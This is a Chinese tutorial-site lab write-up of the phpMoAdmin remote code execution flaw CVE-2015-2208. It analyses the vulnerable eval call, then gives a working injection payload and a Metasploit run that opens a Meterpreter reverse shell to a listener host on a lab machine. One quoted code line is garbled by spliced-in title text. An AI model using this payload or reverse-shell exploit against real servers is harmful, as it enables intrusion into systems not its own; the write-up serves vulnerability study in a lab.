[PHP知识库] phpmoadmin 远程代码执行（CVE-2015-2208）

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> phpmoadmin 远程代码执行（CVE-2015-2208） -> 正文阅读

[PHP知识库]phpmoadmin 远程代码执行（CVE-2015-2208）

phpmoadmin 远程代码执行（CVE-2015-2208）

描述: phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具，可用于创建、删除和修改数据库和索引，提供视图和数据搜索工具，提供数据库启动时间和内存的统计，支持JSON 格式数据的导入导出。 moadmin.php 开头检查POST是否传输了object，随后内包含的if进行判断，这个过程即调用了当前类的saveObject方法，POST传入object参数的值带入eval后就造成了代码执行。

环境搭建

靶机：CentOS7（192.168.2.101:8888）

利用vulhub一键搭建docker环境：

docker pull ptantiku/cve-2015-2208
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

至此环境搭建完毕

漏洞分析

www/html/moadmin.php第693行：

public function saveObject($collection, $obj) {
        eval('$obj=' . $obj . ';'); //cast from string to array
        return $this->mongo->selectCollection($collection)->save($obj);
    }

发现了eval函数，看看那些函数调用了saveObject

发现该函数只被调用了一次

www/html/moadmin.php第787行：

if (isset($_POST['object'])) {
            if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
                return $this->_dumpFormVals();
            } else {
                $action = 'editObject';
                $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';
            }
        } else if ($action == 'creatphpMoadmin CVE-2015-2208 远程代码执行漏洞分析eCollection') {
            self::$model->$action($_GET['collection']);
        } else if ($action == 'renameCollection'
                   && isset($_POST['collectionto']) && $_POST['collectionto'] != $_POST['collectionfrom']) {
            self::$model->$action($_POST['collectionfrom'], $_POST['collectionto']);
            $_GET['collection'] = $_POST['collectionto'];
            $action = 'listRows';
        }

上文代码为函数__construct的代码段_

可以发现eval处的$obj是post传输进来的，参数名为object

构造函数（constructor method，也称为构造器）是类中的一种特殊函数，当使用 new 关键字实例化一个对象时，构造函数将会自动调用。

很明显，在1977行处实例化了moadminComponent对象

$mo = new moadminComponent;

因此漏洞出现的位置和原理已经很明确了。

漏洞利用

构造payload：

object=1;system("whoami");

命令执行成功！

msf中也继承了对该漏洞的利用

msf6 exploit(multi/http/phpmoadmin_exec) > show options 

Module options (exploit/multi/http/phpmoadmin_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.2.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8888             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /phpmoadmin      yes       The URI path of the PHPMoAdmin page
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.104    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHPMoAdmin


msf6 exploit(multi/http/phpmoadmin_exec) > exploit 

[*] Started reverse TCP handler on 192.168.2.104:4444 
[*] Executing payload...
[*] Sending stage (39282 bytes) to 192.168.2.101
[*] Meterpreter session 1 opened (192.168.2.104:4444 -> 192.168.2.101:54428) at 2022-01-07 11:13:03 +0800

ls

meterpreter > 
meterpreter > ls
Listing: /var/www/html/phpmoadmin
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  113923  fil   2013-05-28 13:08:52 +0800  moadmin.php

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > ls
Listing: /var/www/html/phpmoadmin
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  113923  fil   2013-05-28 13:08:52 +0800  moadmin.php

meterpreter > shell
Process 96 created.
Channel 0 created.
ls
moadmin.php